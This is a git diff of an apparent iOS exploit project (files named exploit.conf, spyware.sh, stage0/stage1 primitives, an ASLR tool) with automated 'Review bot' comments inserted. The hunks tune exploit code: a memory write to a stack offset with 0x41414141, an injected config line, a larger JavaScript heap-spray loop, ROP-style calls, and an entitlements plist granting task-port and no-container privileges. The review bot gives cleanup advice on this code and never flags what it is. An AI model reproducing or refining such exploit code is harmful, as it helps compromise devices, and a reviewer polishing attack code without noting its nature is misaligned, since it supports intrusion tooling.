-rw-r--r--[-rwxr-xr-x]build.sh0
-rw-r--r--[-rwxr-xr-x]build_native.sh0
-rw-r--r--[-rwxr-xr-x]exploit.conf0
-rw-r--r--[-rwxr-xr-x]install.sh0
-rw-r--r--[-rwxr-xr-x]install_native.sh0
-rw-r--r--js/main.js2
-rw-r--r--[-rwxr-xr-x]spyware.sh0
-rw-r--r--[-rwxr-xr-x]src/common.h0
-rw-r--r--[-rwxr-xr-x]src/ip_tools.c0
-rw-r--r--[-rwxr-xr-x]src/ip_tools.h0
-rw-r--r--src/main.c11
-rw-r--r--[-rwxr-xr-x]src/patchfinder.h0
-rw-r--r--[-rwxr-xr-x]src/stage0_primitives.c0
-rw-r--r--[-rwxr-xr-x]src/stage0_primitives.h0
-rw-r--r--[-rwxr-xr-x]src/stage1_primitives.c0
-rw-r--r--[-rwxr-xr-x]src/stage1_primitives.h0
-rw-r--r--[-rwxr-xr-x]tools/build.sh0
-rw-r--r--[-rwxr-xr-x]tools/ent.xml28
-rw-r--r--[-rwxr-xr-x]tools/fuck_aslr.c0
-rw-r--r--[-rwxr-xr-x]tools/fuck_ptr.c0
-rw-r--r--[-rwxr-xr-x]tools/jit_all_the_things.c0
-rw-r--r--[-rwxr-xr-x]tools/test.c0
22 files changed, 22 insertions, 19 deletions
diff --git a/build.sh b/build.sh
index 3bd3809..3bd3809 100755..100644
--- a/build.sh
+++ b/build.sh
diff --git a/build_native.sh b/build_native.sh
index 12ec3b9..12ec3b9 100755..100644
--- a/build_native.sh
+++ b/build_native.sh
diff --git a/exploit.conf b/exploit.conf
index 8bf3bf1..8bf3bf1 100755..100644
--- a/exploit.conf
+++ b/exploit.conf
diff --git a/install.sh b/install.sh
index 3dcfb9c..3dcfb9c 100755..100644
--- a/install.sh
+++ b/install.sh
diff --git a/install_native.sh b/install_native.sh
index 325515a..325515a 100755..100644
--- a/install_native.sh
+++ b/install_native.sh
diff --git a/js/main.js b/js/main.js
index b75af4e..7f1e78e 100644
--- a/js/main.js
+++ b/js/main.js
@@ -69,7 +69,7 @@ function main() {
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
- calls4arg("sleep", 1, 0, 0, 0);
+// calls4arg("sleep", 1, 0, 0, 0);
i++;
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
}
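Review bot: The `calls4arg("sleep", 1, 0, 0, 0);` line is disabled by turning it into a comment rather than deleting it, and nothing in the hunk records why it was there or why it is now off, so it joins the other commented-out `call4arg` lines around it as dead code whose purpose a later reader cannot recover. Either remove the line outright or keep it behind a one-line reason, e.g. `// sleep disabled: <reason>` with the placeholder replaced by the actual motivation, since the hunk itself does not state one. The enclosing `main()` begins and ends outside this hunk.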
diff --git a/spyware.sh b/spyware.sh
index dac5939..dac5939 100755..100644
--- a/spyware.sh
+++ b/spyware.sh
diff --git a/src/common.h b/src/common.h
index 9550400..9550400 100755..100644
--- a/src/common.h
+++ b/src/common.h
diff --git a/src/ip_tools.c b/src/ip_tools.c
index 6e36b64..6e36b64 100755..100644
--- a/src/ip_tools.c
+++ b/src/ip_tools.c
diff --git a/src/ip_tools.h b/src/ip_tools.h
index a011094..a011094 100755..100644
--- a/src/ip_tools.h
+++ b/src/ip_tools.h
diff --git a/src/main.c b/src/main.c
index 124affa..3c8d513 100644
--- a/src/main.c
+++ b/src/main.c
@@ -202,11 +202,11 @@ int main(int argc,
fprintf(fp, "# - with love from spv <3\n");
fprintf(fp, "\n");
-// uint32_t stack_base = 0x1c7738; // my shell setup
+ uint32_t stack_base = 0x1c7738; // my shell setup
// uint32_t stack_base = 0x1c7c88; // my 4s shell setup
// uint32_t stack_base = 0x1c2e48; // my lldb
// uint32_t stack_base = 0x1c7d68; // btserver env
- uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env
+// uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env
uint32_t magic_trigger_addr = 0xb6074;
uint32_t mov_r0_0_bx_lr = 0x8d3e | 1;
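Review bot: `stack_base` is still chosen by commenting one `uint32_t stack_base = ...;` declaration in and another out, so the value that ends up in the generated output depends on which line was last toggled, and neither the build nor the output records which environment it was produced for. The diffstat shows the repository already carries an `exploit.conf`; making this a single declaration initialised from a named constant or a configuration value (e.g. `uint32_t stack_base = STACK_BASE;` with the per-environment values kept in a commented table next to the define) would make the selection explicit and reviewable. A short comment such as `// stack_base is environment-specific; the generated file is only valid for the value chosen here` would also help. `main()` starts and ends outside this hunk.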
@@ -286,6 +286,9 @@ int main(int argc,
0x42424242));
#endif
+ fprintf(fp, "%s\n", write32_unslid(stack_base - 0x948, 0x41414141));
+ fprintf(fp, "mode_cfg{dns41.1.1.1;}");
+
#if 0
// fprintf(fp,
// "%s\n",
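Review bot: The second added line, `fprintf(fp, "mode_cfg{dns41.1.1.1;}");`, writes no trailing `\n`, unlike every other `fprintf(fp, ...)` visible in this file, so whatever is written to `fp` next is appended to the same line; if that is intentional it deserves a comment, otherwise append the newline. On the first added line the `0x948` offset is a bare magic number and should be a named constant, and the ownership of the string returned by `write32_unslid` is not visible here — if that helper allocates, the pointer is dropped after the `%s` and leaked on every call. A note on return ownership at `write32_unslid`'s declaration (not in this hunk) would settle that, and the hunk itself could carry `// FIXME: name the 0x948 offset` until the constant exists. `main()` starts and ends outside this hunk.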
@@ -334,7 +337,7 @@ int main(int argc,
"var parent = new Uint8Array(0x100);"
"var child = new Uint8Array(0x100);"
" var fuck = new Array();"
- " for (var i = 0; i < 0x10000; i++) {"
+ " for (var i = 0; i < 0x200000; i++) {"
" fuck[i] = i;"
" }"
" delete fuck;"
@@ -343,7 +346,7 @@ int main(int argc,
strlen("var parent = new Uint8Array(0x100);"
"var child = new Uint8Array(0x100);"
" var fuck = new Array();"
- " for (var i = 0; i < 0x10000; i++) {"
+ " for (var i = 0; i < 0x200000; i++) {"
" fuck[i] = i;"
" }"
" delete fuck;"
diff --git a/src/patchfinder.h b/src/patchfinder.h
index 21af7e3..21af7e3 100755..100644
--- a/src/patchfinder.h
+++ b/src/patchfinder.h
diff --git a/src/stage0_primitives.c b/src/stage0_primitives.c
index b54cb1a..b54cb1a 100755..100644
--- a/src/stage0_primitives.c
+++ b/src/stage0_primitives.c
diff --git a/src/stage0_primitives.h b/src/stage0_primitives.h
index a9a71eb..a9a71eb 100755..100644
--- a/src/stage0_primitives.h
+++ b/src/stage0_primitives.h
diff --git a/src/stage1_primitives.c b/src/stage1_primitives.c
index ffe7b53..ffe7b53 100755..100644
--- a/src/stage1_primitives.c
+++ b/src/stage1_primitives.c
diff --git a/src/stage1_primitives.h b/src/stage1_primitives.h
index d6b9c33..d6b9c33 100755..100644
--- a/src/stage1_primitives.h
+++ b/src/stage1_primitives.h
diff --git a/tools/build.sh b/tools/build.sh
index 5baab83..5baab83 100755..100644
--- a/tools/build.sh
+++ b/tools/build.sh
diff --git a/tools/ent.xml b/tools/ent.xml
index 35801e8..2973d1d 100755..100644
--- a/tools/ent.xml
+++ b/tools/ent.xml
@@ -1,15 +1,15 @@
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>platform-application</key>
- <true/>
- <key>com.apple.private.security.no-container</key>
- <true/>
- <key>com.apple.system-task-ports</key>
- <true/>
- <key>task_for_pid-allow</key>
- <true/>
- <key>get-task-allow</key>
- <true/>
-</dict>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+ <key>platform-application</key>
+ <true/>
+ <key>com.apple.private.security.no-container</key>
+ <true/>
+ <key>com.apple.system-task-ports</key>
+ <true/>
+ <key>task_for_pid-allow</key>
+ <true/>
+ <key>get-task-allow</key>
+ <true/>
+</dict>
</plist> \ No newline at end of file
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c
index c8e9714..c8e9714 100755..100644
--- a/tools/fuck_aslr.c
+++ b/tools/fuck_aslr.c
diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c
index 25eab56..25eab56 100755..100644
--- a/tools/fuck_ptr.c
+++ b/tools/fuck_ptr.c
diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c
index d955ea1..d955ea1 100755..100644
--- a/tools/jit_all_the_things.c
+++ b/tools/jit_all_the_things.c
diff --git a/tools/test.c b/tools/test.c
index 6682971..6682971 100755..100644
--- a/tools/test.c
+++ b/tools/test.c